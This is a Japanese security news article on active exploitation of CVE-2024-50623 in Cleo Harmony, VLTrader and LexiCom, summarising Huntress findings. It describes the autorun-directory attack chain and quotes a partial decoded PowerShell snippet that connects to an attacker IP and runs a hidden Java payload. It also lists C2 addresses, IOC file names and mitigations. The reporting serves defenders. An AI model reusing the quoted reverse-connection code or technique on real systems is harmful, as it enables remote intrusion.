Cleo 製品群の脆弱性 CVE-2024-50623 の積極的な悪用：Huntress が PoC を公開

CVE-2024-50623: Critical Vulnerability in Cleo Software Actively Exploited in the Wild

2024/12/10 SecurityOnline — ファイル転送の管理ツール Cleo Harmony／VLTrader／LexiCom に存在する、脆弱性 CVE-2024-50623 が積極的に悪用されていると、Huntress Labs が警告している。脅威アクターたちは、数多くの組織を一斉に標的にしており、物流／配送／消費者製品などの業界で深刻な影響が生じている。

12月3日の時点で Huntress が特定したのは、Cleo のソフトウェアを標的とする、悪意のアクティビティの急増である。この攻撃で悪用が確認された脆弱性 CVE-2024-50623 は、未認証の攻撃者にリモート・コード実行を許すものであり、バージョン 5.8.0.21 以下の、すべてに対して影響を及ぼすものだ。Huntress の指摘は、「現時点の最新パッチ (バージョン 5.8.0.21) を適用しても、この脆弱性は緩和されない。脅威アクターたちが、このソフトウェアを大規模に悪用し、ポスト・エクスプロイト活動を行っている証拠を発見した」というものだ。

現時点での主な被害者は、コンシューマ製品／食品／物流などの組織であり、潜在的に脆弱なシステムが、Shodan で大量に検出されている。この悪用が 12月8日に急増したことも、Huntress は指摘している。

この悪用チェーンでは、任意のファイル書き込みの脆弱性が悪用されている。最初のステップで攻撃者は、Cleo のオートラン・ディレクトリに悪意のファイルを仕掛けるが、それらのファイルは、実行後において自動的に処理／削除されるものである。このメカニズムにより、PowerShell コマンドの実行が容易になるため、攻撃者は JAR ファイルなどの追加ペイロードを取得し、ウェブシェルのような永続性を達成できるようになる。

Huntress の調査では、以下のようなデコードされた PowerShell コマンドが発見された：

$c=New-Object Net.Sockets.TcpClient("176.123.5.126", 443)
$s=$c.GetStream()
...
Start-Process -WindowStyle Hidden -FilePath jre\bin\java.exe -ArgumentList "-jar $f"

この攻撃には、Active Directory の列挙を行うための、 nltest.exe などの偵察ツールが組み込まれている。また、C2 (command and control) サーバは、”176.123.5.126″／”5.149.249.226″ といった外部 IP アドレスにより維持されている。

ユーザー組織に対して Huntress が推奨するのは、包括的なパッチがリリースされるまでの間は、インターネットに面した Cleo システムをファイアウォール内に隔離することである。また、現時点における緩和策としては、ソフトウェアのコンフィグ・オプション内の “Autorun Directory” フィールドをクリアし、自動実行の機能を無効化するという方法もある。しかし、この手法では、ファイル書き込みの脆弱性に対して、根本から対処できない点に注意が必要だ。

Huntress の推奨事項には、侵害の兆候 (IOC：indicators of compromise) の確認もある。この IoC が示すのは、”main.xml” や “60282967-dc91-40ef-a34c-38e992509c2c.xml” といった、エンコードされた PowerShell コマンドを取り込むファイルの存在である。さらに同社は、今後に提供される予定の、パッチ適用の緊急性を強調している。

この脆弱性に対処するために、Cleo と協力する Huntress は、欠陥を説明するための PoC も開発している。Huntress は、「私たちのチームは、発見した内容を Cleo に報告し、悪用を完全に防止する新たなパッチを開発するために、同社のチームと連絡を取り合っているところだ」と述べている。

Cleo 製品群の脆弱性が積極的に悪用されているとのことです。さらに、PoC も公開されていますので、ご利用のチームは、十分にご注意ください。なお、この記事がポストされた時点では、CVE が採番されていませんでしたが、その後の Cleo と Huntress のサイトに、”CVE-2024-50623″ が明記されていたので、それに合わせて文面を調整しています。

Share this: